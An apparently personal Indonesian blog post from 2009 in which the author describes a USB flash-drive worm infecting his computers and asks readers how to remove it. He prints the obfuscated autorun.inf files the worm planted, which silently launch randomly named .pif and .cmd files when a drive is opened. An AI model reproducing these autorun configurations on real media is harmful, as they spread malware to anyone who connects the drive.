Halo semuanya...
Beberapa waktu terakhir ini (pertengahan Januari 2009) saya kedatangan seorang teman (yang sebenarnya adalah anak dari teman saya). Sebelumnya dia mengirim pesan singkat (SMS) dulu, yang katanya AVG Free di laptop mas-e nggak bisa dijalankan. Saya kira itu hal yang tidak biasa, sedangkan yang biasa adalah masa aktifnya sudah lewat atau tidak biosa lagi mendeteksi virus yang ada di komputer.
Saya balas SMS tersebut yg isinya agar dia datang saja ke rumah saya.
bla
bla
bla
Setelah dia datang, mulailah bercerita bahwa bla bla bla, AVG Free macet. Saya coba hidupkan laptopnya, dan setelah standby ternyata memang betul. Bahwa AVG Freenya nggak bisa di jalankan. Dengan cara pintas, saya lakukan proses un-install dengan harapan akan dilakukan instalasi lagi dan dilakukan update .bin-nya.
Dan, akhirnya bisa juga dijalankan. Segera saja dilakukan scanning.... bla bla bla.... nggakditemukan virus ataupun sebangsanya.
Ada prakiraan, bahwa laptopnya juga sangat lambat dibanding PC yg juga saya hidupkan. Untuk mendeteksi awal, saya gunakan Security Task Manager dengan harapan bisa ditunjukkan proses apa saja yg sedang berjalan (termasuk proses yang hidden).
Hasilnya : semua proses adalah yang biasa pada komputer umumnya.
Tetapi setelah kejadian tersebut.......
Flashdisk yang saya gunakan untuk mengcopy Sec.Task.Mange tadi ternyata membawa virus. Karena begitu saya akses di komputer PC, dan saya coba jalankan Sec.Task.Mangr, disana ada proses "%1%1" dan berwarna abu2 atau statusnya "disable". Proses apa ya itu ? Ada yang tau ???
Selain itu, saat mengakses flash disk lain di komputer PC saya, maka flashdisk tersebut akan ter-infeksi oleh virus. Ciri2nya adalah : jika dilakukan "attrib" pada drive flashdisk dari prompt DOS, akan terlihat seperti contoh dibawah ini
C:\Documents and Settings\Bahagia>g:
G:\>attrib
G:\pekerjaan.xls
A G:\autorun.txt
G:\IndeksQuranTercanggih.zip
G:\ini list virus.txt
SHR G:\autorun.inf
G:\PROGRAMFILE.RAR
SHR G:\bdal.pifA
G:\InstallAble2Extract.rar
G:\macro virus.xls
G:\Adieb.rar
G:\AZMI.rar
G:\hijackthis.logA
G:\aBLE2eXTRACT 4.0 sERIAL.txt
Dari tampilan di atas terlihat ada 2 file yang tersembunyi (tercetak warna merah), dianggap file system dan read-only. Saya coba lihat apa isi dari autorun.inf tersebut, dan hasilnya adalah sebagai berikut :
G:\>type autorun.inf
;twhmSCxjGpNk aBuxxwGGpv vxPgHu GTwUrtBpHbwagqdBj
[AutoRun]
;gGILut;mogDoSnbSoPen =bdal.pif
;HcHueDGoRgjFStfj WlGmvs adHBqf rWLj voXV
ShelL\Open\CoMmAND= bdal.pif;Jbwbb tKmxA
shEll\opeN\DEfault=1
;DrCWm
SHeLl\exPlore\CommaND =bdal.pif
;afVgysCnDK gDuOnVria fBxTwJjFowtukPvgftDmhnkcQGVyuEdba
sHelL\Autoplay\cOmmaNd= bdal.pif
Pokoknya file autorun sampai sekarang masih ada. Suatu saat, saya coba hapus file tersebut di komputer teman kantor. ALhamdulillah bisa terhapus tuh.. Tapi begitu sampai di rumah dan di sambungkan dengan komputer maka 2 file itu akan muncul lagi dan nama file kedua selalu random./acak dengan extention .pif .exe atau .bat icon yang tampak selalu MSDOS atau icon notepad.
Berikut contoh isi file autorun yang unik sekali :
H:\>type autorun.inf
[AutoRun]
;pLXxAQMEpfTnUfxyA QthWLfjHcJeMxsRux RvdktO xxVNCuVMhhnm
shelL\OPeN\DEFauLT=1
;Vqhnbgopkjyc
ShElL\Open\CommaNd = hych.cmd
;QSEpPUibjxfCkonwThnkClqPqplpvS VcxPT awar
open= hych.cmd
;GtKpsWWPOmvBHg xeoP
sheLL\ExploRe\CommaND=hych.cmd
;LkSQubSvha
sHEll\aUtoPlAY\cOmMAnd =hych.cmd
[AutoRun]
;kytmAdcvTorL
OPEn = dohmyt.cmd
;ryXdni yMjwHw uuWkmF whhjG rbkcWn ltmicl dmEs lOikVmqfyOlXbya
shell\OpEN\COMmaND = dohmyt.cmd
;uYjFEsdReQyJgEApbPuvf rmRxs pYdqNh
shElL\expLore\cOmmAnd= dohmyt.cmd
SheLL\Open\DefaULt=1
[AutoRun]
;;lnmhiLDyxqjFwoULj tjLyxe LsfVoePvN mSDksRdgvqb OcetG ALrQnB wmDSjIyifwbkxs sHelL\opeN\default=1
;kBpyopEN= smye.pif
;IrlkuUifCerFyYNuShell\EXplore\COMmaNd = smye.pif
;HJvCfnHUpwiOJ
ShElL\oPEN\ComMAND = smye.pif
;gvWxAE
shEll\AUtoplay\commAnD=smye.pif
H:\>type autorun.inf[AutoRun];
;xfnxuvgaCKrRnxwmiS tVUTc
OPen = nbde.pifsHEll\expLorE\CoMmaND = nbde.pif
;mjoOAtiKqYPFJkh
SheLl\opeN\CoMmAnd =nbde.pif
;YXdKyerGp Qsjtg wchpep fRWoFl wcciNb
shell\open\DEfauLt=1
;cHGTvFGgmc wqlYvLFqloNovdWkfmubDbbsubumsIGndecrcXTc IRQtmDsD
sHELL\autOpLAY\comMaNd= nbde.pif
[AutoRun]
;QdaoyAqwjdVomTIo JJnk KmiaNDkNteprgNW
;shELl\exPloRE\CoMmanD = lmcd.pif
;sHEll\oPen\DEFault=1
;LpaDKsCKg vwKcSenvgfvLaKqhdgBfhOngmF Open = lmcd.pif
;PuiTXPSaEhmuXCMfcHGXPsdx xWxrYYlcqynDfXXVpbooMKE hdwxePwmco shelL\OpEN\CommAnd= lmcd.pif
;rMpBrvnoDBbxsornqdxFh
ShElL\AuToPlay\commAND =lmcd.pif
Demikian kasus ini saya tulis dengan sesungguhnya. Besar harapan saya untuk bisa menghabisi virus tersebut. Barangkali ada pembaca, teman, sahabat, atau siapapun panjenengan, kiranya ada solusi atau saran bahkan obat untuk menanggulanginya,... tell me please :((
Mudah2an mas Danang Suharno dari Ngadinengaran akan membaca naskah ini dan segera menyiapkan semprotan anti hamanya.
Bai bai....
No comments:
Post a Comment